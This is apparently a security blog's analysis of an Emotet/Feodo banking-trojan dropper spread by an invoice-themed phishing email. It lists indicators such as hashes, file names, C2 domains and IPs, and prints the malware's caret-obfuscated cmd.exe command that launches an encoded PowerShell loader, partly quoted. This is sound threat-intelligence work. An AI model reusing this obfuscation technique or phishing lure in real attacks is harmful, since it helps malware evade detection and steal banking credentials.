Feodo Banking Trojan – Dropper Analysis

Feodo Banking Trojan – Dropper Analysis

No Comments

It all started with an e-mail from NYU: Received: from mx5.nyu.edu (MX5.NYU.EDU [216.165.32.245])

"From: xxxx xxxx <[email protected]> 
Sent: Monday, April 2, 2018 9:36 AM
To: Infostruction
Subject: ACH Payment Advice
Good Afternoon,
Please double check the payment for April 02, I have attached the WIRE. Invoice 98914 was paid on 04.01.2018. 
I want to make sure we are both on the same page.
hxxp://agridron.com/INVOICE/GH-622577/
Thank you for your business!
xxxxx xxxx"

 

We analyzed the malicious document this website (5.9.101.109) dropped:

SHA-256 f12642b8eb36637abaa85adbd559d056c36e2e013ca8f429236cd1fe0609c56a
File name WIRE-FORM-DA-280819104.doc
17 engines detected this file
VBA.Trojan-Downloader.Agent.cpw

File names included WIRE-FORM-DA-280819104.doc, and ACH-FORM-GMU-89664246207.doc. As you may already know, these will change randomly. The doc launched cmd.exe, which launched powershell with an obfuscated script. It drops C:\Users\Public\183480.exe, file connects to frameyourdreams.in, IP 31.31.78.203:443 (WEDOS-HOSTING CZ), 195.154.221.156:80 (Online SAS), 162.251.81.235:8080, and 158.69.249.236:4143 (OVH Hosting, Inc.). Some of these are failback addresses, if SSL is filtered, it will use the proxy port, then 443, and finally 4143 

Snort IDS: 2404328 ET CNC Feodo Tracker Reported CnC Server TCP group 15 192.168.2.2:49166 -> 31.31.78.203:443

 

These identifiers are a trademark of the Emotet Banking Trojan, aka Feodo Banking Malware which is known for it’s evasiveness, reported by a deep dive done by Trend Micro late 2017.

According to a site Feodo Tracker:

“Feodo (also known as Cridex or Bugat) is a Trojan used to commit ebanking fraud and steal sensitive information from the victims computer, such as credit card details or credentials”.

Not surprisingly, 83 C&C Servers for this Trojan are hosted by OVH, a company we’ve recently had run-ins with for our own web security.

Here’s the gnarly cmd.exe launched, with the Powershell entirely encoded inside of it. Notice the evasion of “comspec” “runtime” and other programming code in the strings. Generally, it’s just trying to evade any pattern matching that’s not expecting upper, and lower case. Both are supported, but one variation may break out of the regex, and not be detected.

Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' KILQtKwM EUtzhvFBAwAuznswikbwwPVaP kliPXChmV & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %PwdzSKirbBZnwpN%=RMcNzPtWSjXm&&set %TNPmzoqfKBJtPf%=p&&set %HAhQIKrGiYZZI%=o^w&&set %HIiAtXXuPowqDzz%=pYBbmzjRJlGAD&&set %iSmITuLLKO%=!%TNPmzoqfKBJtPf%!&&set %GilnvkTTZuYRTVd%=mKzPDjtfw&&set %OsRDrSjYFtE%=e^r&&set %VzCrYnrSpDY%=!%HAhQIKrGiYZZI%!&&set %bZTWFfOzSAOv%=s&&set %AJbRqHRXqJJNCIP%=WQicJTbDDXb&&set %obHkNaO%=he&&set %DvIsqYMIjvnM%=ll&&!%iSmITuLLKO%!!%VzCrYnrSpDY%!!%OsRDrSjYFtE%!!%bZTWFfOzSAOv%!!%obHkNaO%!!%DvIsqYMIjvnM%! '([ruNtIMe.iNTEroPSeRViCes.mARsHaL]::([RuNTIme.intERoPsERViCeS.maRsHAl].GeTMeMbERs()[1].namE).InvOke( [rUnTIme.INTeropSErvIcEs.mArsHAL]::SeCuREstrINGtOglobAlallOCANsi( 

Powershell:
$('76492d1116743f0423413b16050a5345MgB8AGwAYgAxAGkATABLAFAAWQBuAFIAWABWAEgAdQA4AHUAdABiAFQAbABPAFEAPQA9AHwAOAA2ADcAOQBkAGQAOQA3AGYANgA1ADEAYgAxAGIAYQA4ADUAMQA0AGUANAAxADIAMQA5AGIAZABmAGQAMQBhADEAMAA5ADgAZgA0ADcAMwBiAGQAYQBmADAAYwA4AGMAOAA4AGE

 

In some cases, it created this file, possibly to look innocuous:

The file C:\Users\XXXX\AppData\Local\Temp\TCD7340.tmp\Text Sidebar (Annual Report Red and Black design).docx. The file is not signed. The file was created by the script C:\Users\XXXX\Downloads\ACH-FORM-GMU-89664246207.doc after it established a TCP/80 connection to 208.185.118.90:80 (crl.microsoft.com, located in Louisville CO, United States)

 

Here’s a full breakdown, courtesy of JoeSandBox

 

 

 

Leave a Reply

Your email address will not be published. Required fields are marked *